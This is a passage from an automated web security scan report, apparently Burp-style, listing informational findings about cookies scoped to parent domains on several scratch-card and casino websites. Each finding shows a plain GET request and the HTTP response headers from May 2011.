Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.28. http://de.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://de.scratch2cash.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_1=EncryptedUniqueVisitorID=388748C1F7262AA76BF3603A585497C0&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:31:29 GMT; path=/
UniqueVisitorID=388748C1F7262AA76BF3603A585497C0; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: de.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1ayip0bh1mevynynz4icpq55; path=/; HttpOnly
Set-Cookie: LanguageCode=GER; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=388748C1F7262AA76BF3603A585497C0&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:31:29 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/
Set-Cookie: UniqueVisitorID=388748C1F7262AA76BF3603A585497C0; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/
Set-Cookie: LanguageCode=GER; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.29. http://de.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://de.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_8=EncryptedUniqueVisitorID=AA70828418124DA51B8663347992C3C5&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:31:28 GMT; path=/
UniqueVisitorID=AA70828418124DA51B8663347992C3C5; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: de.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=h25bh155gvlaq045moqwhh2p; path=/; HttpOnly
Set-Cookie: LanguageCode=GER; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=AA70828418124DA51B8663347992C3C5&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:31:28 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/
Set-Cookie: UniqueVisitorID=AA70828418124DA51B8663347992C3C5; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/
Set-Cookie: LanguageCode=GER; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.30. http://el.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://el.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_27=EncryptedUniqueVisitorID=B283729EB6F5F870238B9E9540B5B5C7&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
UniqueVisitorID=B283729EB6F5F870238B9E9540B5B5C7; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: el.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=25hayo55lagve42tdt2pyq55; path=/; HttpOnly
Set-Cookie: LanguageCode=GRE; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=B283729EB6F5F870238B9E9540B5B5C7&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: UniqueVisitorID=B283729EB6F5F870238B9E9540B5B5C7; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: LanguageCode=GRE; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.31. http://es.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://es.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_12=EncryptedUniqueVisitorID=64782A228F974BACFC7F6F262E43ABE6&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:12:29 GMT; path=/
UniqueVisitorID=64782A228F974BACFC7F6F262E43ABE6; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: es.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:12:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=x4ssgtmj3jlvc145m24vlpap; path=/; HttpOnly
Set-Cookie: LanguageCode=SPA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=64782A228F974BACFC7F6F262E43ABE6&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:12:29 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: UniqueVisitorID=64782A228F974BACFC7F6F262E43ABE6; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.32. http://es.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://es.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_27=EncryptedUniqueVisitorID=A8390FBE79EEBAE99D501DC41ACC13EE&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:10:17 GMT; path=/
UniqueVisitorID=A8390FBE79EEBAE99D501DC41ACC13EE; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: es.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:10:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2fqv2zf00zxxhy45nsxwkkn5; path=/; HttpOnly
Set-Cookie: LanguageCode=SPA; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=A8390FBE79EEBAE99D501DC41ACC13EE&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:10:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/
Set-Cookie: UniqueVisitorID=A8390FBE79EEBAE99D501DC41ACC13EE; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:10:17 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.33. http://es.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://es.scratch2cash.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_1=EncryptedUniqueVisitorID=0B048888371F42A6FD0E38C9F2E9454A&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:20:44 GMT; path=/
UniqueVisitorID=0B048888371F42A6FD0E38C9F2E9454A; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: es.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2gztkjbjjhq5j245dm50ad3r; path=/; HttpOnly
Set-Cookie: LanguageCode=SPA; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=0B048888371F42A6FD0E38C9F2E9454A&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:20:44 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/
Set-Cookie: UniqueVisitorID=0B048888371F42A6FD0E38C9F2E9454A; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:20:44 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.34. http://es.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://es.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_8=EncryptedUniqueVisitorID=94A1C2407036BBC289743D1C0069248E&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:34:59 GMT; path=/
UniqueVisitorID=94A1C2407036BBC289743D1C0069248E; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: es.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gin3f3ve5ssjqvecjgozqu2m; path=/; HttpOnly
Set-Cookie: LanguageCode=SPA; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=94A1C2407036BBC289743D1C0069248E&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:34:59 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/
Set-Cookie: UniqueVisitorID=94A1C2407036BBC289743D1C0069248E; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:34:59 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.35. http://fi.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fi.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_12=EncryptedUniqueVisitorID=3153576B5369B48DCBD5E871A054BE1B&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:20:15 GMT; path=/
UniqueVisitorID=3153576B5369B48DCBD5E871A054BE1B; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fi.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wjfbcr2m41ex5r55rhrnngmf; path=/; HttpOnly
Set-Cookie: LanguageCode=FIN; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=3153576B5369B48DCBD5E871A054BE1B&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:20:15 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: UniqueVisitorID=3153576B5369B48DCBD5E871A054BE1B; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: LanguageCode=FIN; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:20:15 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.36. http://fi.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fi.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_27=EncryptedUniqueVisitorID=66554D0353AB8B09EEE1CC87E1812987&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:45:17 GMT; path=/
UniqueVisitorID=66554D0353AB8B09EEE1CC87E1812987; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fi.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hmgr1d45cnyeul45w4fbbd45; path=/; HttpOnly
Set-Cookie: LanguageCode=FIN; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=66554D0353AB8B09EEE1CC87E1812987&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:45:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/
Set-Cookie: UniqueVisitorID=66554D0353AB8B09EEE1CC87E1812987; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/
Set-Cookie: LanguageCode=FIN; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:45:17 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.37. http://fi.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fi.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_8=EncryptedUniqueVisitorID=E866F9AC47D8C2AEE178FD730FCA6C25&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:24:05 GMT; path=/
UniqueVisitorID=E866F9AC47D8C2AEE178FD730FCA6C25; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fi.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:24:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zn3bsef0l0ekkt45uzojyfea; path=/; HttpOnly
Set-Cookie: LanguageCode=FIN; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=E866F9AC47D8C2AEE178FD730FCA6C25&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:24:05 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/
Set-Cookie: UniqueVisitorID=E866F9AC47D8C2AEE178FD730FCA6C25; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:24:05 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.38. http://fr.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fr.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_12=EncryptedUniqueVisitorID=9C666BD06D3E98CB4BE6D10ED7B38C7A&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:10 GMT; path=/
UniqueVisitorID=9C666BD06D3E98CB4BE6D10ED7B38C7A; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: fr.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bifmqjz1ktedjhqr1owcwx55; path=/; HttpOnly
Set-Cookie: LanguageCode=FRE; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=9C666BD06D3E98CB4BE6D10ED7B38C7A&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:10 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
Set-Cookie: UniqueVisitorID=9C666BD06D3E98CB4BE6D10ED7B38C7A; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:10 GMT; path=/
